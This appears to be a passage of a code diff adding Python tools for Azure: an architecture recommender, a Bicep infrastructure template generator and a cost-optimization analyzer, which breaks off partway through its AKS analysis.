"Data transfer (cross-region)": "$50-200",
},
"pros": [
"Global low latency",
"99.99% availability",
"Automatic failover",
"Data residency compliance",
"Front Door WAF at the edge",
],
"cons": [
"1.5-2x cost vs single region",
"Data consistency challenges (Cosmos DB conflict resolution)",
"Complex deployment pipeline",
"Cross-region data transfer costs",
],
"scaling": {
"users_supported": "100k - 100M",
"requests_per_second": "10,000 - 10,000,000",
"method": "Per-region autoscale + Front Door global routing",
},
}
PATTERN_DISPATCH = {
"app_service_web": _app_service_web,
"app_service_scaled": _app_service_web, # same builder, cost adjusts
"aks_microservices": _aks_microservices,
"container_apps": _container_apps,
"serverless_functions": _serverless_functions,
"synapse_pipeline": _synapse_pipeline,
"serverless_data": _serverless_data,
"multi_region_web": _multi_region_web,
}
# ---------------------------------------------------------------------------
# Core recommendation logic
# ---------------------------------------------------------------------------
def recommend(app_type: str, users: int, requirements: Dict) -> Dict[str, Any]:
"""Return architecture recommendation for the given inputs."""
bucket = _size_bucket(users)
patterns = ARCHITECTURE_PATTERNS.get(app_type, ARCHITECTURE_PATTERNS["web_app"])
pattern_key = patterns.get(bucket, "app_service_web")
builder = PATTERN_DISPATCH.get(pattern_key, _app_service_web)
result = builder(users, requirements)
# Add compliance notes if relevant
compliance = requirements.get("compliance", [])
if compliance:
result["compliance_notes"] = []
if "HIPAA" in compliance:
result["compliance_notes"].append(
"Enable Microsoft Defender for Cloud, BAA agreement, audit logging, encryption at rest with CMK"
)
if "SOC2" in compliance:
result["compliance_notes"].append(
"Azure Policy SOC 2 initiative, Defender for Cloud regulatory compliance dashboard"
)
if "GDPR" in compliance:
result["compliance_notes"].append(
"Data residency in EU region, Purview for data classification, consent management"
)
if "ISO27001" in compliance or "ISO 27001" in compliance:
result["compliance_notes"].append(
"Azure Policy ISO 27001 initiative, audit logs to Log Analytics, access reviews in Entra ID"
)
return result
def generate_checklist(result: Dict[str, Any]) -> List[Dict[str, Any]]:
"""Return an implementation checklist for the recommended architecture."""
services = result.get("service_stack", [])
return [
{
"phase": "Planning",
"tasks": [
"Review architecture pattern and Azure services",
"Estimate costs with Azure Pricing Calculator",
"Define environment strategy (dev, staging, production)",
"Set up Azure subscription and resource groups",
"Define tagging strategy (environment, owner, cost-center, app-name)",
],
},
{
"phase": "Foundation",
"tasks": [
"Create VNet with subnets (app, data, management)",
"Configure NSGs and Private Endpoints",
"Set up Entra ID groups and RBAC assignments",
"Create Key Vault and seed with initial secrets",
"Enable Microsoft Defender for Cloud",
],
},
{
"phase": "Core Services",
"tasks": [f"Deploy {svc}" for svc in services],
},
{
"phase": "Security",
"tasks": [
"Enable Managed Identity on all services",
"Configure Private Endpoints for PaaS resources",
"Set up Application Gateway or Front Door with WAF",
"Assign Azure Policy initiatives (CIS, SOC 2, etc.)",
"Enable diagnostic settings on all resources",
],
},
{
"phase": "Monitoring",
"tasks": [
"Create Log Analytics workspace",
"Enable Application Insights for all services",
"Create Azure Monitor alert rules for critical metrics",
"Set up Action Groups for notifications (email, Teams, PagerDuty)",
"Create Azure Dashboard for operational visibility",
],
},
{
"phase": "CI/CD",
"tasks": [
"Set up Azure DevOps or GitHub Actions pipeline",
"Configure workload identity federation (no secrets in CI)",
"Implement Bicep deployment pipeline with what-if preview",
"Set up staging slots or blue-green deployment",
"Document rollback procedures",
],
},
]
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def _format_text(result: Dict[str, Any]) -> str:
lines = []
lines.append(f"Pattern: {result['recommended_pattern']}")
lines.append(f"Description: {result['description']}")
lines.append(f"Use Case: {result['use_case']}")
lines.append(f"Estimated Monthly Cost: ${result['estimated_monthly_cost_usd']}")
lines.append("")
lines.append("Service Stack:")
for svc in result.get("service_stack", []):
lines.append(f" - {svc}")
lines.append("")
lines.append("Cost Breakdown:")
for k, v in result.get("cost_breakdown", {}).items():
lines.append(f" {k}: {v}")
lines.append("")
lines.append("Pros:")
for p in result.get("pros", []):
lines.append(f" + {p}")
lines.append("")
lines.append("Cons:")
for c in result.get("cons", []):
lines.append(f" - {c}")
if result.get("compliance_notes"):
lines.append("")
lines.append("Compliance Notes:")
for note in result["compliance_notes"]:
lines.append(f" * {note}")
lines.append("")
lines.append("Scaling:")
for k, v in result.get("scaling", {}).items():
lines.append(f" {k}: {v}")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Azure Architecture Designer — recommend Azure architecture patterns based on application requirements.",
epilog="Examples:\n"
" python architecture_designer.py --app-type web_app --users 10000\n"
" python architecture_designer.py --app-type microservices --users 50000 --json\n"
' python architecture_designer.py --app-type serverless --users 5000 --requirements \'{"compliance":["HIPAA"]}\'',
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"--app-type",
required=True,
choices=["web_app", "saas_platform", "mobile_backend", "microservices", "data_pipeline", "serverless"],
help="Application type to design for",
)
parser.add_argument(
"--users",
type=int,
default=1000,
help="Expected number of users (default: 1000)",
)
parser.add_argument(
"--requirements",
type=str,
default="{}",
help="JSON string of additional requirements (budget_monthly_usd, compliance, etc.)",
)
parser.add_argument(
"--checklist",
action="store_true",
help="Include implementation checklist in output",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_output",
help="Output as JSON instead of human-readable text",
)
args = parser.parse_args()
try:
reqs = json.loads(args.requirements)
except json.JSONDecodeError as exc:
print(f"Error: invalid --requirements JSON: {exc}", file=sys.stderr)
sys.exit(1)
result = recommend(args.app_type, args.users, reqs)
if args.checklist:
result["implementation_checklist"] = generate_checklist(result)
if args.json_output:
print(json.dumps(result, indent=2))
else:
print(_format_text(result))
if args.checklist:
print("\n--- Implementation Checklist ---")
for phase in result["implementation_checklist"]:
print(f"\n{phase['phase']}:")
for task in phase["tasks"]:
print(f" [ ] {task}")
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,775 @@
#!/usr/bin/env python3
"""
Azure Bicep template generator.
Generates Bicep infrastructure-as-code scaffolds for common Azure architecture patterns.
Usage:
python bicep_generator.py --arch-type web-app
python bicep_generator.py --arch-type microservices --output main.bicep
python bicep_generator.py --arch-type serverless --json
python bicep_generator.py --help
"""
import argparse
import json
import sys
from typing import Dict
# ---------------------------------------------------------------------------
# Bicep templates
# ---------------------------------------------------------------------------
def _web_app_template() -> str:
return r"""// =============================================================================
// Azure Web App Architecture — Bicep Template
// App Service + Azure SQL + Front Door + Key Vault + Application Insights
// =============================================================================
@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'
@description('Azure region')
param location string = resourceGroup().location
@description('Application name (lowercase, no spaces)')
@minLength(3)
@maxLength(20)
param appName string
@description('SQL admin Entra ID object ID')
param sqlAdminObjectId string
// ---------------------------------------------------------------------------
// Key Vault
// ---------------------------------------------------------------------------
resource keyVault 'Microsoft.KeyVault/vaults@2023-07-01' = {
name: '${environment}-${appName}-kv'
location: location
properties: {
sku: { family: 'A', name: 'standard' }
tenantId: subscription().tenantId
enableRbacAuthorization: true
enableSoftDelete: true
softDeleteRetentionInDays: 30
networkAcls: {
defaultAction: 'Deny'
bypass: 'AzureServices'
}
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// App Service Plan + App Service
// ---------------------------------------------------------------------------
resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
name: '${environment}-${appName}-plan'
location: location
sku: {
name: environment == 'production' ? 'P1v3' : 'B1'
tier: environment == 'production' ? 'PremiumV3' : 'Basic'
capacity: 1
}
properties: {
reserved: true // Linux
}
tags: {
environment: environment
'app-name': appName
}
}
resource appService 'Microsoft.Web/sites@2023-01-01' = {
name: '${environment}-${appName}-web'
location: location
properties: {
serverFarmId: appServicePlan.id
httpsOnly: true
siteConfig: {
linuxFxVersion: 'NODE|20-lts'
minTlsVersion: '1.2'
ftpsState: 'Disabled'
alwaysOn: environment == 'production'
healthCheckPath: '/health'
}
}
identity: {
type: 'SystemAssigned'
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Azure SQL (Serverless)
// ---------------------------------------------------------------------------
resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
name: '${environment}-${appName}-sql'
location: location
properties: {
administrators: {
administratorType: 'ActiveDirectory'
azureADOnlyAuthentication: true
principalType: 'Group'
sid: sqlAdminObjectId
tenantId: subscription().tenantId
}
minimalTlsVersion: '1.2'
publicNetworkAccess: environment == 'production' ? 'Disabled' : 'Enabled'
}
tags: {
environment: environment
'app-name': appName
}
}
resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
parent: sqlServer
name: '${appName}-db'
location: location
sku: {
name: 'GP_S_Gen5_2'
tier: 'GeneralPurpose'
}
properties: {
autoPauseDelay: environment == 'production' ? -1 : 60
minCapacity: json('0.5')
zoneRedundant: environment == 'production'
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Application Insights + Log Analytics
// ---------------------------------------------------------------------------
resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
name: '${environment}-${appName}-logs'
location: location
properties: {
sku: { name: 'PerGB2018' }
retentionInDays: environment == 'production' ? 90 : 30
}
tags: {
environment: environment
'app-name': appName
}
}
resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
name: '${environment}-${appName}-ai'
location: location
kind: 'web'
properties: {
Application_Type: 'web'
WorkspaceResourceId: logAnalytics.id
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------
output appServiceUrl string = 'https://${appService.properties.defaultHostName}'
output keyVaultUri string = keyVault.properties.vaultUri
output appInsightsKey string = appInsights.properties.InstrumentationKey
output sqlServerFqdn string = sqlServer.properties.fullyQualifiedDomainName
"""
def _microservices_template() -> str:
return r"""// =============================================================================
// Azure Microservices Architecture — Bicep Template
// AKS + API Management + Cosmos DB + Service Bus + Key Vault
// =============================================================================
@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'
@description('Azure region')
param location string = resourceGroup().location
@description('Application name')
@minLength(3)
@maxLength(20)
param appName string
@description('AKS admin Entra ID group object ID')
param aksAdminGroupId string
// ---------------------------------------------------------------------------
// Key Vault
// ---------------------------------------------------------------------------
resource keyVault 'Microsoft.KeyVault/vaults@2023-07-01' = {
name: '${environment}-${appName}-kv'
location: location
properties: {
sku: { family: 'A', name: 'standard' }
tenantId: subscription().tenantId
enableRbacAuthorization: true
enableSoftDelete: true
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// AKS Cluster
// ---------------------------------------------------------------------------
resource aksCluster 'Microsoft.ContainerService/managedClusters@2024-01-01' = {
name: '${environment}-${appName}-aks'
location: location
identity: { type: 'SystemAssigned' }
properties: {
dnsPrefix: '${environment}-${appName}'
kubernetesVersion: '1.29'
enableRBAC: true
aadProfile: {
managed: true
adminGroupObjectIDs: [aksAdminGroupId]
enableAzureRBAC: true
}
networkProfile: {
networkPlugin: 'azure'
networkPolicy: 'azure'
serviceCidr: '10.0.0.0/16'
dnsServiceIP: '10.0.0.10'
}
agentPoolProfiles: [
{
name: 'system'
count: environment == 'production' ? 3 : 1
vmSize: 'Standard_D2s_v5'
mode: 'System'
enableAutoScaling: true
minCount: 1
maxCount: 3
availabilityZones: environment == 'production' ? ['1', '2', '3'] : []
}
{
name: 'app'
count: environment == 'production' ? 3 : 1
vmSize: 'Standard_D4s_v5'
mode: 'User'
enableAutoScaling: true
minCount: 1
maxCount: 10
availabilityZones: environment == 'production' ? ['1', '2', '3'] : []
}
]
addonProfiles: {
omsagent: {
enabled: true
config: {
logAnalyticsWorkspaceResourceID: logAnalytics.id
}
}
}
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Container Registry
// ---------------------------------------------------------------------------
resource acr 'Microsoft.ContainerRegistry/registries@2023-07-01' = {
name: '${environment}${appName}acr'
location: location
sku: { name: environment == 'production' ? 'Standard' : 'Basic' }
properties: {
adminUserEnabled: false
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Cosmos DB (Serverless for dev, Autoscale for prod)
// ---------------------------------------------------------------------------
resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-11-15' = {
name: '${environment}-${appName}-cosmos'
location: location
kind: 'GlobalDocumentDB'
properties: {
databaseAccountOfferType: 'Standard'
consistencyPolicy: { defaultConsistencyLevel: 'Session' }
locations: [
{ locationName: location, failoverPriority: 0, isZoneRedundant: environment == 'production' }
]
capabilities: environment == 'dev' ? [{ name: 'EnableServerless' }] : []
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Service Bus
// ---------------------------------------------------------------------------
resource serviceBus 'Microsoft.ServiceBus/namespaces@2022-10-01-preview' = {
name: '${environment}-${appName}-sb'
location: location
sku: { name: 'Standard', tier: 'Standard' }
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Log Analytics + Application Insights
// ---------------------------------------------------------------------------
resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
name: '${environment}-${appName}-logs'
location: location
properties: {
sku: { name: 'PerGB2018' }
retentionInDays: environment == 'production' ? 90 : 30
}
tags: {
environment: environment
'app-name': appName
}
}
resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
name: '${environment}-${appName}-ai'
location: location
kind: 'web'
properties: {
Application_Type: 'web'
WorkspaceResourceId: logAnalytics.id
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------
output aksClusterName string = aksCluster.name
output acrLoginServer string = acr.properties.loginServer
output cosmosEndpoint string = cosmosAccount.properties.documentEndpoint
output serviceBusEndpoint string = '${serviceBus.name}.servicebus.windows.net'
output keyVaultUri string = keyVault.properties.vaultUri
"""
def _serverless_template() -> str:
return r"""// =============================================================================
// Azure Serverless Architecture — Bicep Template
// Azure Functions + Event Grid + Service Bus + Cosmos DB
// =============================================================================
@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'
@description('Azure region')
param location string = resourceGroup().location
@description('Application name')
@minLength(3)
@maxLength(20)
param appName string
// ---------------------------------------------------------------------------
// Storage Account (required by Functions)
// ---------------------------------------------------------------------------
resource storageAccount 'Microsoft.Storage/storageAccounts@2023-01-01' = {
name: '${environment}${appName}st'
location: location
sku: { name: 'Standard_LRS' }
kind: 'StorageV2'
properties: {
supportsHttpsTrafficOnly: true
minimumTlsVersion: 'TLS1_2'
allowBlobPublicAccess: false
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Azure Functions (Consumption Plan)
// ---------------------------------------------------------------------------
resource functionPlan 'Microsoft.Web/serverfarms@2023-01-01' = {
name: '${environment}-${appName}-func-plan'
location: location
sku: {
name: 'Y1'
tier: 'Dynamic'
}
properties: {
reserved: true // Linux
}
tags: {
environment: environment
'app-name': appName
}
}
resource functionApp 'Microsoft.Web/sites@2023-01-01' = {
name: '${environment}-${appName}-func'
location: location
kind: 'functionapp,linux'
identity: { type: 'SystemAssigned' }
properties: {
serverFarmId: functionPlan.id
httpsOnly: true
siteConfig: {
linuxFxVersion: 'NODE|20'
minTlsVersion: '1.2'
ftpsState: 'Disabled'
appSettings: [
{ name: 'AzureWebJobsStorage', value: 'DefaultEndpointsProtocol=https;AccountName=${storageAccount.name};EndpointSuffix=core.windows.net;AccountKey=${storageAccount.listKeys().keys[0].value}' }
{ name: 'FUNCTIONS_EXTENSION_VERSION', value: '~4' }
{ name: 'FUNCTIONS_WORKER_RUNTIME', value: 'node' }
{ name: 'APPINSIGHTS_INSTRUMENTATIONKEY', value: appInsights.properties.InstrumentationKey }
{ name: 'COSMOS_ENDPOINT', value: cosmosAccount.properties.documentEndpoint }
{ name: 'SERVICE_BUS_CONNECTION', value: listKeys('${serviceBus.id}/AuthorizationRules/RootManageSharedAccessKey', serviceBus.apiVersion).primaryConnectionString }
]
}
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Cosmos DB (Serverless)
// ---------------------------------------------------------------------------
resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-11-15' = {
name: '${environment}-${appName}-cosmos'
location: location
kind: 'GlobalDocumentDB'
properties: {
databaseAccountOfferType: 'Standard'
consistencyPolicy: { defaultConsistencyLevel: 'Session' }
locations: [
{ locationName: location, failoverPriority: 0 }
]
capabilities: [{ name: 'EnableServerless' }]
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Service Bus
// ---------------------------------------------------------------------------
resource serviceBus 'Microsoft.ServiceBus/namespaces@2022-10-01-preview' = {
name: '${environment}-${appName}-sb'
location: location
sku: { name: 'Basic', tier: 'Basic' }
tags: {
environment: environment
'app-name': appName
}
}
resource orderQueue 'Microsoft.ServiceBus/namespaces/queues@2022-10-01-preview' = {
parent: serviceBus
name: 'orders'
properties: {
maxDeliveryCount: 5
defaultMessageTimeToLive: 'P7D'
deadLetteringOnMessageExpiration: true
lockDuration: 'PT1M'
}
}
// ---------------------------------------------------------------------------
// Application Insights + Log Analytics
// ---------------------------------------------------------------------------
resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
name: '${environment}-${appName}-logs'
location: location
properties: {
sku: { name: 'PerGB2018' }
retentionInDays: 30
}
tags: {
environment: environment
'app-name': appName
}
}
resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
name: '${environment}-${appName}-ai'
location: location
kind: 'web'
properties: {
Application_Type: 'web'
WorkspaceResourceId: logAnalytics.id
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------
output functionAppUrl string = 'https://${functionApp.properties.defaultHostName}'
output cosmosEndpoint string = cosmosAccount.properties.documentEndpoint
output serviceBusEndpoint string = '${serviceBus.name}.servicebus.windows.net'
output appInsightsKey string = appInsights.properties.InstrumentationKey
"""
def _data_pipeline_template() -> str:
return r"""// =============================================================================
// Azure Data Pipeline Architecture — Bicep Template
// Event Hubs + Data Lake Gen2 + Synapse Analytics + Azure Functions
// =============================================================================
@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'
@description('Azure region')
param location string = resourceGroup().location
@description('Application name')
@minLength(3)
@maxLength(20)
param appName string
// ---------------------------------------------------------------------------
// Data Lake Storage Gen2
// ---------------------------------------------------------------------------
resource dataLake 'Microsoft.Storage/storageAccounts@2023-01-01' = {
name: '${environment}${appName}dl'
location: location
sku: { name: environment == 'production' ? 'Standard_ZRS' : 'Standard_LRS' }
kind: 'StorageV2'
properties: {
isHnsEnabled: true // Hierarchical namespace for Data Lake Gen2
supportsHttpsTrafficOnly: true
minimumTlsVersion: 'TLS1_2'
allowBlobPublicAccess: false
}
tags: {
environment: environment
'app-name': appName
}
}
resource rawContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2023-01-01' = {
name: '${dataLake.name}/default/raw'
properties: { publicAccess: 'None' }
}
resource curatedContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2023-01-01' = {
name: '${dataLake.name}/default/curated'
properties: { publicAccess: 'None' }
}
// ---------------------------------------------------------------------------
// Event Hubs
// ---------------------------------------------------------------------------
resource eventHubNamespace 'Microsoft.EventHub/namespaces@2023-01-01-preview' = {
name: '${environment}-${appName}-eh'
location: location
sku: {
name: 'Standard'
tier: 'Standard'
capacity: environment == 'production' ? 2 : 1
}
properties: {
minimumTlsVersion: '1.2'
}
tags: {
environment: environment
'app-name': appName
}
}
resource eventHub 'Microsoft.EventHub/namespaces/eventhubs@2023-01-01-preview' = {
parent: eventHubNamespace
name: 'ingest'
properties: {
partitionCount: environment == 'production' ? 8 : 2
messageRetentionInDays: 7
}
}
resource consumerGroup 'Microsoft.EventHub/namespaces/eventhubs/consumergroups@2023-01-01-preview' = {
parent: eventHub
name: 'processing'
}
// ---------------------------------------------------------------------------
// Synapse Analytics (Serverless SQL)
// ---------------------------------------------------------------------------
resource synapse 'Microsoft.Synapse/workspaces@2021-06-01' = {
name: '${environment}-${appName}-syn'
location: location
identity: { type: 'SystemAssigned' }
properties: {
defaultDataLakeStorage: {
accountUrl: 'https://${dataLake.name}.dfs.core.windows.net'
filesystem: 'curated'
}
sqlAdministratorLogin: 'sqladmin'
sqlAdministratorLoginPassword: 'REPLACE_WITH_KEYVAULT_REFERENCE'
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Log Analytics
// ---------------------------------------------------------------------------
resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
name: '${environment}-${appName}-logs'
location: location
properties: {
sku: { name: 'PerGB2018' }
retentionInDays: 30
}
tags: {
environment: environment
'app-name': appName
}
}
// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------
output dataLakeEndpoint string = 'https://${dataLake.name}.dfs.core.windows.net'
output eventHubNamespace string = eventHubNamespace.name
output synapseEndpoint string = synapse.properties.connectivityEndpoints.sql
"""
TEMPLATES: Dict[str, callable] = {
"web-app": _web_app_template,
"microservices": _microservices_template,
"serverless": _serverless_template,
"data-pipeline": _data_pipeline_template,
}
TEMPLATE_DESCRIPTIONS = {
"web-app": "App Service + Azure SQL + Front Door + Key Vault + Application Insights",
"microservices": "AKS + API Management + Cosmos DB + Service Bus + Key Vault",
"serverless": "Azure Functions + Event Grid + Service Bus + Cosmos DB",
"data-pipeline": "Event Hubs + Data Lake Gen2 + Synapse Analytics + Azure Functions",
}
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
description="Azure Bicep Generator — generate Bicep IaC templates for common Azure architecture patterns.",
epilog="Examples:\n"
" python bicep_generator.py --arch-type web-app\n"
" python bicep_generator.py --arch-type microservices --output main.bicep\n"
" python bicep_generator.py --arch-type serverless --json",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"--arch-type",
required=True,
choices=list(TEMPLATES.keys()),
help="Architecture pattern type",
)
parser.add_argument(
"--output",
type=str,
default=None,
help="Write Bicep to file instead of stdout",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_output",
help="Output metadata as JSON (template content + description)",
)
args = parser.parse_args()
template_fn = TEMPLATES[args.arch_type]
bicep_content = template_fn()
if args.json_output:
result = {
"arch_type": args.arch_type,
"description": TEMPLATE_DESCRIPTIONS[args.arch_type],
"bicep_template": bicep_content,
"lines": len(bicep_content.strip().split("\n")),
}
print(json.dumps(result, indent=2))
elif args.output:
with open(args.output, "w") as f:
f.write(bicep_content)
print(f"Bicep template written to {args.output} ({len(bicep_content.strip().split(chr(10)))} lines)")
print(f"Pattern: {TEMPLATE_DESCRIPTIONS[args.arch_type]}")
print(f"\nNext steps:")
print(f" 1. az bicep build --file {args.output}")
print(f" 2. az deployment group validate --resource-group <rg> --template-file {args.output}")
print(f" 3. az deployment group create --resource-group <rg> --template-file {args.output}")
else:
print(bicep_content)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,492 @@
#!/usr/bin/env python3
"""
Azure cost optimization analyzer.
Analyzes Azure resource configurations and provides cost-saving recommendations.
Usage:
python cost_optimizer.py --config resources.json
python cost_optimizer.py --config resources.json --json
python cost_optimizer.py --help
Expected JSON config format:
{
"virtual_machines": [
{"name": "vm-web-01", "size": "Standard_D4s_v5", "cpu_utilization": 12, "pricing": "on-demand", "monthly_cost": 140}
],
"sql_databases": [
{"name": "sqldb-main", "tier": "GeneralPurpose", "vcores": 8, "utilization": 25, "monthly_cost": 400}
],
"storage_accounts": [
{"name": "stmyapp", "size_gb": 500, "tier": "Hot", "has_lifecycle_policy": false}
],
"aks_clusters": [
{"name": "aks-prod", "node_count": 6, "node_size": "Standard_D4s_v5", "avg_cpu_utilization": 35, "monthly_cost": 800}
],
"cosmos_db": [
{"name": "cosmos-orders", "ru_provisioned": 10000, "ru_used_avg": 2000, "monthly_cost": 580}
],
"public_ips": [
{"name": "pip-unused", "attached": false}
],
"app_services": [
{"name": "app-web", "tier": "PremiumV3", "instance_count": 3, "cpu_utilization": 15, "monthly_cost": 300}
],
"has_budget_alerts": false,
"has_advisor_enabled": false
}
"""
import argparse
import json
import sys
from typing import Dict, List, Any
class AzureCostOptimizer:
"""Analyze Azure resource configurations and recommend cost savings."""
def __init__(self, resources: Dict[str, Any]):
self.resources = resources
self.recommendations: List[Dict[str, Any]] = []
def analyze(self) -> Dict[str, Any]:
"""Run all analysis passes and return full report."""
self.recommendations = []
total_savings = 0.0
total_savings += self._analyze_virtual_machines()
total_savings += self._analyze_sql_databases()
total_savings += self._analyze_storage()
total_savings += self._analyze_aks()
total_savings += self._analyze_cosmos_db()
total_savings += self._analyze_app_services()
total_savings += self._analyze_networking()
total_savings += self._analyze_general()
current_spend = self._estimate_current_spend()
return {
"current_monthly_usd": round(current_spend, 2),
"potential_monthly_savings_usd": round(total_savings, 2),
"optimized_monthly_usd": round(current_spend - total_savings, 2),
"savings_percentage": round((total_savings / current_spend) * 100, 2) if current_spend > 0 else 0,
"recommendations": self.recommendations,
"priority_actions": self._top_priority(),
}
# ------------------------------------------------------------------
# Analysis passes
# ------------------------------------------------------------------
def _analyze_virtual_machines(self) -> float:
savings = 0.0
vms = self.resources.get("virtual_machines", [])
for vm in vms:
cost = vm.get("monthly_cost", 140)
cpu = vm.get("cpu_utilization", 100)
pricing = vm.get("pricing", "on-demand")
# Idle VMs
if cpu < 5:
savings += cost * 0.9
self.recommendations.append({
"service": "Virtual Machines",
"type": "Idle Resource",
"issue": f"VM {vm.get('name', '?')} has <5% CPU utilization",
"recommendation": "Deallocate or delete the VM. Use Azure Automation auto-shutdown for dev/test VMs.",
"potential_savings_usd": round(cost * 0.9, 2),
"priority": "high",
})
elif cpu < 20:
savings += cost * 0.4
self.recommendations.append({
"service": "Virtual Machines",
"type": "Right-sizing",
"issue": f"VM {vm.get('name', '?')} is under-utilized ({cpu}% CPU)",
"recommendation": "Downsize to a smaller SKU. Use Azure Advisor right-sizing recommendations.",
"potential_savings_usd": round(cost * 0.4, 2),
"priority": "high",
})
# Reserved Instances
if pricing == "on-demand" and cpu >= 20:
ri_savings = cost * 0.35
savings += ri_savings
self.recommendations.append({
"service": "Virtual Machines",
"type": "Reserved Instances",
"issue": f"VM {vm.get('name', '?')} runs on-demand with steady utilization",
"recommendation": "Purchase 1-year Reserved Instance (up to 35% savings) or 3-year (up to 55% savings).",
"potential_savings_usd": round(ri_savings, 2),
"priority": "medium",
})
# Spot VMs for batch/fault-tolerant workloads
spot_candidates = [vm for vm in vms if vm.get("workload_type") in ("batch", "dev", "test")]
if spot_candidates:
spot_savings = sum(vm.get("monthly_cost", 100) * 0.6 for vm in spot_candidates)
savings += spot_savings
self.recommendations.append({
"service": "Virtual Machines",
"type": "Spot VMs",
"issue": f"{len(spot_candidates)} VMs running batch/dev/test workloads on regular instances",
"recommendation": "Switch to Azure Spot VMs for up to 90% savings on interruptible workloads.",
"potential_savings_usd": round(spot_savings, 2),
"priority": "medium",
})
return savings
def _analyze_sql_databases(self) -> float:
savings = 0.0
dbs = self.resources.get("sql_databases", [])
for db in dbs:
cost = db.get("monthly_cost", 200)
utilization = db.get("utilization", 100)
vcores = db.get("vcores", 2)
tier = db.get("tier", "GeneralPurpose")
# Idle databases
if db.get("connections_per_day", 1000) < 10:
savings += cost * 0.8
self.recommendations.append({
"service": "Azure SQL",
"type": "Idle Resource",
"issue": f"Database {db.get('name', '?')} has <10 connections/day",
"recommendation": "Delete unused database or switch to serverless tier with auto-pause.",
"potential_savings_usd": round(cost * 0.8, 2),
"priority": "high",
})
# Serverless opportunity
elif utilization < 30 and tier == "GeneralPurpose":
serverless_savings = cost * 0.45
savings += serverless_savings
self.recommendations.append({
"service": "Azure SQL",
"type": "Serverless Migration",
"issue": f"Database {db.get('name', '?')} has low utilization ({utilization}%) on provisioned tier",
"recommendation": "Switch to Azure SQL Serverless tier with auto-pause (60-min delay). Pay only for active compute.",
"potential_savings_usd": round(serverless_savings, 2),
"priority": "high",
})
# Right-sizing
elif utilization < 50 and vcores > 2:
right_size_savings = cost * 0.3
savings += right_size_savings
self.recommendations.append({
"service": "Azure SQL",
"type": "Right-sizing",
"issue": f"Database {db.get('name', '?')} uses {vcores} vCores at {utilization}% utilization",
"recommendation": f"Reduce to {max(2, vcores // 2)} vCores. Monitor DTU/vCore usage after change.",
"potential_savings_usd": round(right_size_savings, 2),
"priority": "medium",
})
return savings
def _analyze_storage(self) -> float:
savings = 0.0
accounts = self.resources.get("storage_accounts", [])
for acct in accounts:
size_gb = acct.get("size_gb", 0)
tier = acct.get("tier", "Hot")
# Lifecycle policy missing
if not acct.get("has_lifecycle_policy", False) and size_gb > 50:
lifecycle_savings = size_gb * 0.01 # ~$0.01/GB moving hot to cool
savings += lifecycle_savings
self.recommendations.append({
"service": "Blob Storage",
"type": "Lifecycle Policy",
"issue": f"Account {acct.get('name', '?')} ({size_gb} GB) has no lifecycle policy",
"recommendation": "Add lifecycle management: move to Cool after 30 days, Archive after 90 days.",
"potential_savings_usd": round(lifecycle_savings, 2),
"priority": "medium",
})
# Hot tier for large, infrequently accessed data
if tier == "Hot" and size_gb > 500:
tier_savings = size_gb * 0.008
savings += tier_savings
self.recommendations.append({
"service": "Blob Storage",
"type": "Storage Tier",
"issue": f"Account {acct.get('name', '?')} ({size_gb} GB) on Hot tier",
"recommendation": "Evaluate Cool or Cold tier for infrequently accessed data. Hot=$0.018/GB, Cool=$0.01/GB, Cold=$0.0036/GB.",
"potential_savings_usd": round(tier_savings, 2),
"priority": "high",
})
return savings
def _analyze_aks(self) -> float:
savings = 0.0
clusters = self.resources.get("aks_clusters", [])
for cluster in clusters:
